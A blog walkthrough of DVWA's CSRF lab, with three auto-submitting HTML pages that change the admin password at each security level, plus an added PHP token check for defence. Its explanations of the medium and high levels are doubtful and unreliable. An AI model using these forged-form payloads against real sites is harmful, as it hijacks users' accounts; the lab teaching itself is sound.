DVWA (Damn Vulnerable Web App) is a PHP-based web application for practising web pentesting and learning about web vulnerabilities in a safe environment. For instructions on installing DVWA on your system, please visit the link below:
http://www.sec-art.net/2018/06/how-to-install-dvwadamn-vulnerable-web.html
In this post we are going to look at the CSRF example in DVWA. For a basic example of CSRF, please visit our previous post:
Introduction to CSRF
The exploit code used below can be downloaded from: Github_Repo
In the CSRF example there is a password change page where we can change the admin password. Here the password can also be changed from a malicious page, which submits the password change request to the server automatically.
First change the security level to low: go to the DVWA security page and change it from there, or visit the installation page (link given above), and open the CSRF page.
The exploit code to change the password is:
csrf_low.html
<!-- exploit for Challenge : CSRF vulnerability DVWA (at low security settings)-->
<html>
  <body onload="document.getElementById('xsrf').submit();">
    <form id="xsrf" method="GET" action="http://192.168.56.102/dvwa/vulnerabilities/csrf/">
      <input name="password_new" type="hidden" value="hacked">
      <input name="password_conf" type="hidden" value="hacked">
      <input name="Change" type="hidden" value="Change">
    </form>
  </body>
</html>
When we open the above page, it automatically submits the GET form to the server and changes the password to "hacked".
So the password is changed from an external malicious page; if we log out and log back in to DVWA, we now have to enter the password "hacked".
Now let's change the security level to medium. At the medium security level there is a catch:
here the password reset option only works if we open it on the local system with IP 127.0.0.1, so the CSRF exploit is the same but with 127.0.0.1 as the server address.
csrf_med.html
<!-- DVWA CSRF Bypass (Medium level security)-->
<html>
  <body onload="document.getElementById('csrf').submit()">
    <form id="csrf" method="GET" action="http://127.0.0.1/dvwa/vulnerabilities/csrf/">
      <input type="password" name="password_new" value="password">
      <input type="password" name="password_conf" value="password">
      <input type="text" value="Change" name="Change">
    </form>
  </body>
</html>
The above exploit code will change the password to "password".
At the high security level we can see that the CSRF attack will not be practical, because we also have to submit the current password in order to successfully change the password.
But it can still be exploited with a CSRF attack; the code for that is:
csrf_high.html
<!-- DVWA CSRF Bypass (high level security)-->
<html>
  <body onload="document.getElementById('csrf').submit()">
    <form id="csrf" method="GET" action="http://192.168.56.102/dvwa/vulnerabilities/csrf/">
      <input type="password" name="password_current" value="password">
      <input type="password" name="password_new" value="hacked">
      <input type="password" name="password_conf" value="hacked">
      <input type="text" value="Change" name="Change">
    </form>
  </body>
</html>
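On the defensive side, an added example (not DVWA's source and not part of the original post): a PHP check for a password change handler that rejects requests shaped like the forms above, because they arrive over GET and cannot carry a per-session token, while a form rendered by the site with the token passes. The function names and the `csrf_token` field are assumptions; the other field names are the ones used in the forms above.

```php
<?php
// Added example, not DVWA source. check_password_change(), issue_csrf_token() and the
// csrf_token field are hypothetical; the other field names come from the forms above.

function issue_csrf_token(array &$session): string
{
    // Per-session random value that a page on another origin cannot read.
    return $session['csrf_token'] = bin2hex(random_bytes(32));
}

function check_password_change(string $method, array $params, array $session): string
{
    // 1. A state change must not ride on GET (all three forms above use GET).
    if ($method !== 'POST') {
        return "reject: state change over $method";
    }
    // 2. The token must match the session copy; hash_equals() compares in constant time.
    $sent = $params['csrf_token'] ?? '';
    $want = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $want === '' || !hash_equals($want, $sent)) {
        return 'reject: missing or wrong CSRF token';
    }
    // 3. Re-authentication stays as a second layer, not as the CSRF defence.
    $current = $params['password_current'] ?? '';
    if (!is_string($current) || !password_verify($current, $session['password_hash'])) {
        return 'reject: current password incorrect';
    }
    $new = $params['password_new'] ?? '';
    if (!is_string($new) || $new === '' || $new !== ($params['password_conf'] ?? '')) {
        return 'reject: new passwords missing or different';
    }
    return 'accept';
}

// Constructed sample session and requests.
$session = ['password_hash' => password_hash('password', PASSWORD_DEFAULT)];
$token   = issue_csrf_token($session);

$forgedLow  = ['password_new' => 'hacked', 'password_conf' => 'hacked', 'Change' => 'Change'];
$forgedHigh = $forgedLow + ['password_current' => 'password'];
$legit      = ['password_current' => 'password', 'password_new' => 'N3w-passphrase',
               'password_conf' => 'N3w-passphrase', 'csrf_token' => $token];

echo check_password_change('GET',  $forgedLow,  $session), PHP_EOL;
echo check_password_change('GET',  $forgedHigh, $session), PHP_EOL;
echo check_password_change('POST', $forgedHigh, $session), PHP_EOL; // same fields, still no token
echo check_password_change('POST', $legit,      $session), PHP_EOL; // form rendered with the token
```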
Conclusion:
So that's it for the CSRF challenges in DVWA. For more information about the CSRF vulnerability and other vulnerabilities, please visit the link below:
http://www.sec-art.net/p/web-security.html